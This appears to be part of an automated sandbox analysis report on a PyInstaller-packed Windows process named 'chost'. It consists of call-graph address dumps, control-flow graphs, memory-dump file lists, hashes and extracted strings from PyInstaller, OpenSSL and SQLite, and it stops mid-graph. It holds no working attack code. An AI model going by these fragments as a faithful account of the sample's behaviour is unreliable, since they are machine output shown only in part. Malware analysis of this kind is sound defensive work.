7ff694362710 54 API calls _log10_special 71964->72032 71969 7ff69436660f 71966->71969 71971 7ff694366620 71966->71971 72033 7ff694362710 54 API calls _log10_special 71967->72033 72034 7ff694362710 54 API calls _log10_special 71969->72034 71974 7ff69436664a 71971->71974 72035 7ff694377320 73 API calls 71971->72035 71973 7ff694366638 72036 7ff694377320 73 API calls 71973->72036 71974->71951 72037 7ff694362710 54 API calls _log10_special 71974->72037 71978 7ff694366060 71977->71978 71978->71978 71979 7ff694366089 71978->71979 71985 7ff6943660a0 __vcrt_freefls 71978->71985 72039 7ff694362710 54 API calls _log10_special 71979->72039 71981 7ff694366095 71981->71841 71982 7ff6943661ab 71982->71841 71983 7ff694361470 116 API calls 71983->71985 71984 7ff694362710 54 API calls 71984->71985 71985->71982 71985->71983 71985->71984 71986->71843 71988 7ff69436455a 71987->71988 71989 7ff694369400 2 API calls 71988->71989 71990 7ff69436457f 71989->71990 71991 7ff69436c5c0 _log10_special 8 API calls 71990->71991 71992 7ff6943645a7 71991->71992 71992->71924 71993 7ff694369070 71992->71993 71994 7ff694369400 2 API calls 71993->71994 71995 7ff694369084 LoadLibraryExW 71994->71995 71996 7ff6943690a3 __vcrt_freefls 71995->71996 71996->71924 71997->71932 71998->71918 71999->71932 72000->71932 72001->71932 72003 7ff69436541c 72002->72003 72004 7ff694365424 72003->72004 72005 7ff6943655c4 72003->72005 72038 7ff694376b14 48 API calls 72003->72038 72004->71942 72006 7ff694365787 __vcrt_freefls 72005->72006 72007 7ff6943647c0 47 API calls 72005->72007 72006->71942 72007->72005 72010 7ff694364cb0 72009->72010 72011 7ff69436c5c0 _log10_special 8 API calls 72010->72011 72012 7ff694364d1a 72011->72012 72012->71948 72012->71949 72014 7ff694364d55 72013->72014 72015 7ff694361c80 49 API calls 72014->72015 72016 7ff694364da1 72015->72016 72017 7ff694361c80 49 API calls 72016->72017 72026 7ff694364e23 __vcrt_freefls 72016->72026 72018 7ff694364de0 72017->72018 72021 7ff694369400 2 API calls 72018->72021 72018->72026 72019 7ff69436c5c0 _log10_special 8 API calls 72020 7ff694364e6e 72019->72020 72020->71963 72020->71964 72022 7ff694364df6 72021->72022 72023 7ff694369400 2 API calls 72022->72023 72024 7ff694364e0d 72023->72024 72025 7ff694369400 2 API calls 72024->72025 72025->72026 72026->72019 72027->71951 72028->71951 72029->71951 72030->71951 72031->71951 72032->71951 72033->71951 72034->71951 72035->71973 72036->71974 72037->71951 72038->72003 72039->71981 72041 7ff694377968 72040->72041 72044 7ff694377444 72041->72044 72043 7ff694377981 72043->71853 72045 7ff69437748e 72044->72045 72046 7ff69437745f 72044->72046 72054 7ff6943754dc EnterCriticalSection 72045->72054 72055 7ff69437a884 37 API calls 2 library calls 72046->72055 72049 7ff694377493 72050 7ff6943774b0 38 API calls 72049->72050 72051 7ff69437749f 72050->72051 72052 7ff6943754e8 _fread_nolock LeaveCriticalSection 72051->72052 72053 7ff69437747f 72052->72053 72053->72043 72055->72053 72056 7ffdf7019060 72057 7ffdf7019c01 72056->72057 72064 7ffdf7019078 72056->72064 72058 7ffdf7019b0e LoadLibraryA 72059 7ffdf7019b28 72058->72059 72062 7ffdf7019b47 GetProcAddress 72059->72062 72059->72064 72061 7ffdf7019b69 VirtualProtect VirtualProtect 72061->72057 72062->72059 72063 7ffdf7019b5e 72062->72063 72064->72058 72064->72061 72065 7ffdf6a85c00 72067 7ffdf6a85c1d 72065->72067 72066 7ffdf6a85d23 72068 7ffdf6a4127b SetLastError 72066->72068 72067->72066 72067->72067 72071 7ffdf6a85d3e 72067->72071 72070 7ffdf6a85d39 72068->72070 72069 7ffdf6a4127b SetLastError 72069->72070 72071->72069 72071->72070 72072 7ffdf6a5fd40 72073 7ffdf6a5fd50 72072->72073 72074 7ffdf6a5fd62 72073->72074 72078 7ffdf6a414bf 72073->72078 72082 7ffdf6a41df7 72073->72082 72086 7ffdf6a9f070 72073->72086 72078->72074 72079 7ffdf6a9e960 72078->72079 72080 7ffdf6a9f1c1 SetLastError 72079->72080 72081 7ffdf6a9f1d5 72079->72081 72080->72081 72081->72074 72082->72074 72083 7ffdf6a9eaa0 72082->72083 72084 7ffdf6a9f1c1 SetLastError 72083->72084 72085 7ffdf6a9f1d5 72083->72085 72084->72085 72085->72074 72087 7ffdf6a9f180 72086->72087 72088 7ffdf6a9f1c1 SetLastError 72087->72088 72089 7ffdf6a9f1d5 72087->72089 72088->72089 72089->72074 72090 7ffdf70611e0 GetSystemInfo 72091 7ffdf7061214 72090->72091 72092 7ffdf70b0de0 72093 7ffdf70b0e0c 72092->72093 72095 7ffdf70b0e11 72092->72095 72094 7ffdf70d4a80 9 API calls 72093->72094 72094->72095 72096 7ffdf6ab15a0 72097 7ffdf6ab15b8 72096->72097 72098 7ffdf6ab16c6 72097->72098 72099 7ffdf6a41c1c 6 API calls 72097->72099 72099->72097

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 0 7ff694361000-7ff694363806 call 7ff69436fe88 call 7ff69436fe90 call 7ff69436c8c0 call 7ff694375460 call 7ff6943754f4 call 7ff6943636b0 14 7ff694363808-7ff69436380f 0->14 15 7ff694363814-7ff694363836 call 7ff694361950 0->15 16 7ff694363c97-7ff694363cb2 call 7ff69436c5c0 14->16 21 7ff69436391b-7ff694363931 call 7ff6943645b0 15->21 22 7ff69436383c-7ff694363856 call 7ff694361c80 15->22 27 7ff69436396a-7ff69436397f call 7ff694362710 21->27 28 7ff694363933-7ff694363960 call 7ff694367f80 21->28 26 7ff69436385b-7ff69436389b call 7ff694368a20 22->26 35 7ff69436389d-7ff6943638a3 26->35 36 7ff6943638c1-7ff6943638cc call 7ff694374fa0 26->36 40 7ff694363c8f 27->40 38 7ff694363962-7ff694363965 call 7ff6943700bc 28->38 39 7ff694363984-7ff6943639a6 call 7ff694361c80 28->39 41 7ff6943638a5-7ff6943638ad 35->41 42 7ff6943638af-7ff6943638bd call 7ff694368b90 35->42 48 7ff6943639fc-7ff694363a2a call 7ff694368b30 call 7ff694368b90 * 3 36->48 49 7ff6943638d2-7ff6943638e1 call 7ff694368a20 36->49 38->27 53 7ff6943639b0-7ff6943639b9 39->53 40->16 41->42 42->36 76 7ff694363a2f-7ff694363a3e call 7ff694368a20 48->76 58 7ff6943638e7-7ff6943638ed 49->58 59 7ff6943639f4-7ff6943639f7 call 7ff694374fa0 49->59 53->53 56 7ff6943639bb-7ff6943639d8 call 7ff694361950 53->56 56->26 65 7ff6943639de-7ff6943639ef call 7ff694362710 56->65 63 7ff6943638f0-7ff6943638fc 58->63 59->48 66 7ff694363905-7ff694363908 63->66 67 7ff6943638fe-7ff694363903 63->67 65->40 66->59 70 7ff69436390e-7ff694363916 call 7ff694374fa0 66->70 67->63 67->66 70->76 79 7ff694363b45-7ff694363b53 76->79 80 7ff694363a44-7ff694363a47 76->80 82 7ff694363a67 79->82 83 7ff694363b59-7ff694363b5d 79->83 80->79 81 7ff694363a4d-7ff694363a50 80->81 84 7ff694363a56-7ff694363a5a 81->84 85 7ff694363b14-7ff694363b17 81->85 86 7ff694363a6b-7ff694363a90 call 7ff694374fa0 82->86 83->86 84->85 87 7ff694363a60 84->87 88 7ff694363b19-7ff694363b1d 85->88 89 7ff694363b2f-7ff694363b40 call 7ff694362710 85->89 95 7ff694363aab-7ff694363ac0 86->95 96 7ff694363a92-7ff694363aa6 call 7ff694368b30 86->96 87->82 88->89 91 7ff694363b1f-7ff694363b2a 88->91 97 7ff694363c7f-7ff694363c87 89->97 91->86 99 7ff694363ac6-7ff694363aca 95->99 100 7ff694363be8-7ff694363bfa call 7ff694368a20 95->100 96->95 97->40 102 7ff694363bcd-7ff694363be2 call 7ff694361940 99->102 103 7ff694363ad0-7ff694363ae8 call 7ff6943752c0 99->103 109 7ff694363bfc-7ff694363c02 100->109 110 7ff694363c2e 100->110 102->99 102->100 113 7ff694363aea-7ff694363b02 call 7ff6943752c0 103->113 114 7ff694363b62-7ff694363b7a call 7ff6943752c0 103->114 111 7ff694363c04-7ff694363c1c 109->111 112 7ff694363c1e-7ff694363c2c 109->112 115 7ff694363c31-7ff694363c40 call 7ff694374fa0 110->115 111->115 112->115 113->102 124 7ff694363b08-7ff694363b0f 113->124 122 7ff694363b7c-7ff694363b80 114->122 123 7ff694363b87-7ff694363b9f call 7ff6943752c0 114->123 125 7ff694363c46-7ff694363c4a 115->125 126 7ff694363d41-7ff694363d63 call 7ff6943644d0 115->126 122->123 135 7ff694363bac-7ff694363bc4 call 7ff6943752c0 123->135 136 7ff694363ba1-7ff694363ba5 123->136 124->102 128 7ff694363cd4-7ff694363ce6 call 7ff694368a20 125->128 129 7ff694363c50-7ff694363c5f call 7ff6943690e0 125->129 139 7ff694363d65-7ff694363d6f call 7ff694364620 126->139 140 7ff694363d71-7ff694363d82 call 7ff694361c80 126->140 144 7ff694363ce8-7ff694363ceb 128->144 145 7ff694363d35-7ff694363d3c 128->145 142 7ff694363cb3-7ff694363cbd call 7ff694368850 129->142 143 7ff694363c61 129->143 135->102 157 7ff694363bc6 135->157 136->135 148 7ff694363d87-7ff694363d96 139->148 140->148 162 7ff694363cc8-7ff694363ccf 142->162 163 7ff694363cbf-7ff694363cc6 142->163 151 7ff694363c68 call 7ff694362710 143->151 144->145 152 7ff694363ced-7ff694363d10 call 7ff694361c80 144->152 145->151 154 7ff694363d98-7ff694363d9f 148->154 155 7ff694363dc4-7ff694363dda call 7ff694369400 148->155 164 7ff694363c6d-7ff694363c77 151->164 168 7ff694363d2b-7ff694363d33 call 7ff694374fa0 152->168 169 7ff694363d12-7ff694363d26 call 7ff694362710 call 7ff694374fa0 152->169 154->155 160 7ff694363da1-7ff694363da5 154->160 172 7ff694363ddc 155->172 173 7ff694363de8-7ff694363e04 SetDllDirectoryW 155->173 157->102 160->155 166 7ff694363da7-7ff694363dbe SetDllDirectoryW LoadLibraryExW 160->166 162->148 163->151 164->97 166->155 168->148 169->164 172->173 176 7ff694363e0a-7ff694363e19 call 7ff694368a20 173->176 177 7ff694363f01-7ff694363f08 173->177 189 7ff694363e1b-7ff694363e21 176->189 190 7ff694363e32-7ff694363e3c call 7ff694374fa0 176->190 179 7ff694363ffc-7ff694364004 177->179 180 7ff694363f0e-7ff694363f15 177->180 184 7ff694364006-7ff694364023 PostMessageW GetMessageW 179->184 185 7ff694364029-7ff694364034 call 7ff6943636a0 call 7ff694363360 179->185 180->179 183 7ff694363f1b-7ff694363f25 call 7ff6943633c0 180->183 183->164 197 7ff694363f2b-7ff694363f3f call 7ff6943690c0 183->197 184->185 202 7ff694364039-7ff69436405b call 7ff694363670 call 7ff694366fb0 call 7ff694366d60 185->202 194 7ff694363e2d-7ff694363e2f 189->194 195 7ff694363e23-7ff694363e2b 189->195 199 7ff694363ef2-7ff694363efc call 7ff694368b30 190->199 200 7ff694363e42-7ff694363e48 190->200 194->190 195->194 209 7ff694363f64-7ff694363fa7 call 7ff694368b30 call 7ff694368bd0 call 7ff694366fb0 call 7ff694366d60 call 7ff694368ad0 197->209 210 7ff694363f41-7ff694363f5e PostMessageW GetMessageW 197->210 199->177 200->199 204 7ff694363e4e-7ff694363e54 200->204 207 7ff694363e56-7ff694363e58 204->207 208 7ff694363e5f-7ff694363e61 204->208 212 7ff694363e5a 207->212 213 7ff694363e67-7ff694363e83 call 7ff694366db0 call 7ff694367330 207->213 208->177 208->213 248 7ff694363fe9-7ff694363ff7 call 7ff694361900 209->248 249 7ff694363fa9-7ff694363fb3 call 7ff694369200 209->249 210->209 212->177 228 7ff694363e85-7ff694363e8c 213->228 229 7ff694363e8e-7ff694363e95 213->229 231 7ff694363edb-7ff694363ef0 call 7ff694362a50 call 7ff694366fb0 call 7ff694366d60 228->231 232 7ff694363e97-7ff694363ea4 call 7ff694366df0 229->232 233 7ff694363eaf-7ff694363eb9 call 7ff6943671a0 229->233 231->177 232->233 242 7ff694363ea6-7ff694363ead 232->242 243 7ff694363ebb-7ff694363ec2 233->243 244 7ff694363ec4-7ff694363ed2 call 7ff6943674e0 233->244 242->231 243->231 244->177 257 7ff694363ed4 244->257 248->164 249->248 259 7ff694363fb5-7ff694363fca 249->259 257->231 260 7ff694363fcc-7ff694363fdf call 7ff694362710 call 7ff694361900 259->260 261 7ff694363fe4 call 7ff694362a50 259->261 260->164 261->248
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                        • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                        • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                        • Opcode ID: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
                                                                                                                                                                                                                                        • Instruction ID: 6d5ec9cbab3b320319b505cf61f02d885338274f5c20f9d9196418b22e6e0cf8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0508df3f57ee1b007a386c5103efc2761290cd4262653a9171a3b2890b356a0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11326C21A0C68791FA399B3294D62B976A1EF45784F84C0BEDA5DC36D6EF2CE564C300
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $..\s\ssl\record\ssl3_record.c$CONNE$GET $HEAD $POST $PUT $ssl3_get_record
                                                                                                                                                                                                                                        • API String ID: 0-2781224710
                                                                                                                                                                                                                                        • Opcode ID: d39c98ad81025c605fbd399e55ec7b0c2b6e35b2a65b57f07efd4e8fcf478a2e
                                                                                                                                                                                                                                        • Instruction ID: e6629e7c38bd80fcf9bfc05287f2580517682b5c50397124ad9056f48d7cdd39
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d39c98ad81025c605fbd399e55ec7b0c2b6e35b2a65b57f07efd4e8fcf478a2e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5782C071B09A8282FB649B21D460BB973A8EF42B44F448136DA6D4BEDEDF3CE545C700

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 846 7ffdf7069260-7ffdf70692df 847 7ffdf706943d-7ffdf7069453 846->847 848 7ffdf70692e5-7ffdf70692ef 846->848 850 7ffdf706934f-7ffdf7069395 call 7ffdf7056160 847->850 851 7ffdf7069459-7ffdf706945f 847->851 848->847 849 7ffdf70692f5-7ffdf70692f8 848->849 849->851 852 7ffdf70692fe 849->852 860 7ffdf7069a2e-7ffdf7069a31 850->860 861 7ffdf706939b-7ffdf70693ff call 7ffdf7183acc 850->861 851->850 853 7ffdf7069465-7ffdf706947b call 7ffdf7056160 851->853 855 7ffdf7069305-7ffdf706930e 852->855 863 7ffdf7069481-7ffdf706949c 853->863 864 7ffdf7069a8e 853->864 855->855 858 7ffdf7069310-7ffdf706931f call 7ffdf7056160 855->858 858->864 874 7ffdf7069325-7ffdf706933b 00007FFE0E142010 858->874 860->864 865 7ffdf7069a33-7ffdf7069a3a 860->865 872 7ffdf7069728-7ffdf7069738 861->872 873 7ffdf7069405-7ffdf7069421 00007FFE0E142010 861->873 882 7ffdf706949e-7ffdf70694af 863->882 883 7ffdf70694b6-7ffdf70694bd 863->883 869 7ffdf7069a93-7ffdf7069aaa 864->869 870 7ffdf7069a3c-7ffdf7069a46 865->870 871 7ffdf7069a85 865->871 876 7ffdf7069a4e-7ffdf7069a7b 870->876 877 7ffdf7069a48 870->877 871->864 880 7ffdf706967f-7ffdf70696a4 872->880 878 7ffdf70695db 873->878 879 7ffdf7069427-7ffdf7069438 00007FFE0E142010 873->879 881 7ffdf7069340-7ffdf7069347 874->881 876->864 901 7ffdf7069a7d-7ffdf7069a83 876->901 877->876 884 7ffdf70695de-7ffdf7069627 00007FFE0E142010 * 2 878->884 879->884 886 7ffdf70697df 880->886 887 7ffdf70696aa-7ffdf70696af 880->887 881->881 888 7ffdf7069349 881->888 882->883 889 7ffdf70694c0-7ffdf70694c7 883->889 891 7ffdf706967d 884->891 892 7ffdf7069629-7ffdf7069630 884->892 893 7ffdf70697e4-7ffdf70697f2 886->893 887->886 890 7ffdf70696b5-7ffdf70696e1 call 7ffdf705ff80 887->890 888->850 889->889 894 7ffdf70694c9-7ffdf70694d0 889->894 902 7ffdf70696e4-7ffdf7069704 890->902 891->880 896 7ffdf706971a-7ffdf7069723 892->896 897 7ffdf7069636-7ffdf7069640 892->897 898 7ffdf70697f5-7ffdf70697f8 893->898 899 7ffdf70694d7-7ffdf70694de 894->899 896->891 903 7ffdf7069642 897->903 904 7ffdf7069648-7ffdf7069675 897->904 905 7ffdf70697fe-7ffdf7069819 call 7ffdf70687e0 898->905 906 7ffdf70698ab-7ffdf70698b5 898->906 899->899 900 7ffdf70694e0-7ffdf70694f7 899->900 908 7ffdf70694f9 900->908 909 7ffdf7069547-7ffdf706954e 900->909 901->864 913 7ffdf70697da-7ffdf70697dd 902->913 914 7ffdf706970a-7ffdf7069714 902->914 903->904 904->891 944 7ffdf7069677 904->944 905->906 925 7ffdf706981f-7ffdf70698a3 905->925 911 7ffdf70698c3-7ffdf70698d6 call 7ffdf70646a0 906->911 912 7ffdf70698b7-7ffdf70698c0 906->912 916 7ffdf7069500-7ffdf7069507 908->916 918 7ffdf7069572-7ffdf7069579 909->918 919 7ffdf7069550-7ffdf7069557 909->919 938 7ffdf7069a20-7ffdf7069a2c 911->938 939 7ffdf70698dc-7ffdf70698e6 911->939 912->911 913->898 922 7ffdf706973d-7ffdf7069740 914->922 923 7ffdf7069716-7ffdf7069718 914->923 926 7ffdf7069510-7ffdf7069519 916->926 930 7ffdf706957b-7ffdf7069585 918->930 931 7ffdf70695ca 918->931 919->850 927 7ffdf706955d-7ffdf706956c call 7ffdf7115c70 919->927 924 7ffdf7069742-7ffdf706974a 922->924 923->924 935 7ffdf706976e-7ffdf7069784 call 7ffdf7116c60 924->935 936 7ffdf706974c-7ffdf7069760 call 7ffdf7067bb0 924->936 952 7ffdf7069909-7ffdf706990f 925->952 953 7ffdf70698a5 925->953 926->926 932 7ffdf706951b-7ffdf7069529 926->932 927->850 927->918 940 7ffdf706958d-7ffdf70695ba 930->940 941 7ffdf7069587 930->941 946 7ffdf70695d3-7ffdf70695d6 931->946 943 7ffdf7069530-7ffdf7069539 932->943 962 7ffdf706979d 935->962 963 7ffdf7069786-7ffdf706979b call 7ffdf70ce090 935->963 936->935 961 7ffdf7069762-7ffdf7069767 936->961 938->869 949 7ffdf70698ee-7ffdf7069901 939->949 950 7ffdf70698e8 939->950 940->946 970 7ffdf70695bc-7ffdf70695c5 940->970 941->940 943->943 954 7ffdf706953b-7ffdf7069545 943->954 944->891 946->869 949->952 950->949 959 7ffdf7069911-7ffdf7069934 952->959 960 7ffdf7069938-7ffdf7069948 952->960 953->906 954->909 954->916 959->960 973 7ffdf7069950-7ffdf7069981 960->973 974 7ffdf706994a 960->974 961->935 965 7ffdf706979f-7ffdf70697a4 962->965 963->965 968 7ffdf70697d2-7ffdf70697d8 965->968 969 7ffdf70697a6-7ffdf70697bc call 7ffdf7116c60 965->969 968->893 969->913 979 7ffdf70697be-7ffdf70697d0 call 7ffdf70ce090 969->979 970->869 977 7ffdf7069983-7ffdf7069992 973->977 978 7ffdf7069994-7ffdf706999b 973->978 974->973 980 7ffdf706999f-7ffdf70699c1 call 7ffdf7067bb0 977->980 978->980 979->913 979->968 985 7ffdf70699c3-7ffdf70699c7 980->985 986 7ffdf70699c9-7ffdf70699cc 980->986 987 7ffdf70699d7-7ffdf70699e9 985->987 988 7ffdf70699d3 986->988 989 7ffdf70699ce-7ffdf70699d1 986->989 990 7ffdf70699f4-7ffdf7069a06 987->990 991 7ffdf70699eb-7ffdf70699f2 987->991 988->987 989->987 989->988 992 7ffdf7069a0a-7ffdf7069a1e 990->992 991->992 992->869
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E142010
                                                                                                                                                                                                                                        • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                        • API String ID: 2636501453-4201244970
                                                                                                                                                                                                                                        • Opcode ID: 3767d4123ebb06c638636b3ec1cd7d1febdd0afadb762bae8c82de5b3a0db073
                                                                                                                                                                                                                                        • Instruction ID: bf70a376d763701f48e18acd1103eea3739d312f9192d5f8fbee9028229e8428
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3767d4123ebb06c638636b3ec1cd7d1febdd0afadb762bae8c82de5b3a0db073
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA32912AB1978286EB548F259861BB937A1FF44B94F084239CA6E47BD8DF3CE455D300
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: 00007E142010
                                                                                                                                                                                                                                        • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
                                                                                                                                                                                                                                        • API String ID: 2636501453-509082904
                                                                                                                                                                                                                                        • Opcode ID: 853b01d5efd108e7c5e040f14a2816657269065cf72fbe55ca4de533c68ede99
                                                                                                                                                                                                                                        • Instruction ID: 0f04c14153c8e8fb265b755ee4015a13dae2a455388a520f94c35e2a2f34c811
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 853b01d5efd108e7c5e040f14a2816657269065cf72fbe55ca4de533c68ede99
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96127A2AB09A4285EB549F25E460BF967B1FF84B88F584031DE6E877D8DF3CE455A300

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1310 7ff694385c70-7ff694385cab call 7ff6943855f8 call 7ff694385600 call 7ff694385668 1317 7ff694385ed5-7ff694385f21 call 7ff69437a970 call 7ff6943855f8 call 7ff694385600 call 7ff694385668 1310->1317 1318 7ff694385cb1-7ff694385cbc call 7ff694385608 1310->1318 1343 7ff694385f27-7ff694385f32 call 7ff694385608 1317->1343 1344 7ff69438605f-7ff6943860cd call 7ff69437a970 call 7ff6943815e8 1317->1344 1318->1317 1324 7ff694385cc2-7ff694385ccc 1318->1324 1325 7ff694385cee-7ff694385cf2 1324->1325 1326 7ff694385cce-7ff694385cd1 1324->1326 1330 7ff694385cf5-7ff694385cfd 1325->1330 1328 7ff694385cd4-7ff694385cdf 1326->1328 1331 7ff694385cea-7ff694385cec 1328->1331 1332 7ff694385ce1-7ff694385ce8 1328->1332 1330->1330 1334 7ff694385cff-7ff694385d12 call 7ff69437d66c 1330->1334 1331->1325 1335 7ff694385d1b-7ff694385d29 1331->1335 1332->1328 1332->1331 1341 7ff694385d2a-7ff694385d36 call 7ff69437a9b8 1334->1341 1342 7ff694385d14-7ff694385d16 call 7ff69437a9b8 1334->1342 1350 7ff694385d3d-7ff694385d45 1341->1350 1342->1335 1343->1344 1354 7ff694385f38-7ff694385f43 call 7ff694385638 1343->1354 1362 7ff6943860db-7ff6943860de 1344->1362 1363 7ff6943860cf-7ff6943860d6 1344->1363 1350->1350 1353 7ff694385d47-7ff694385d58 call 7ff6943804e4 1350->1353 1353->1317 1364 7ff694385d5e-7ff694385db4 call 7ff69438a540 * 4 call 7ff694385b8c 1353->1364 1354->1344 1365 7ff694385f49-7ff694385f6c call 7ff69437a9b8 GetTimeZoneInformation 1354->1365 1369 7ff694386115-7ff694386128 call 7ff69437d66c 1362->1369 1370 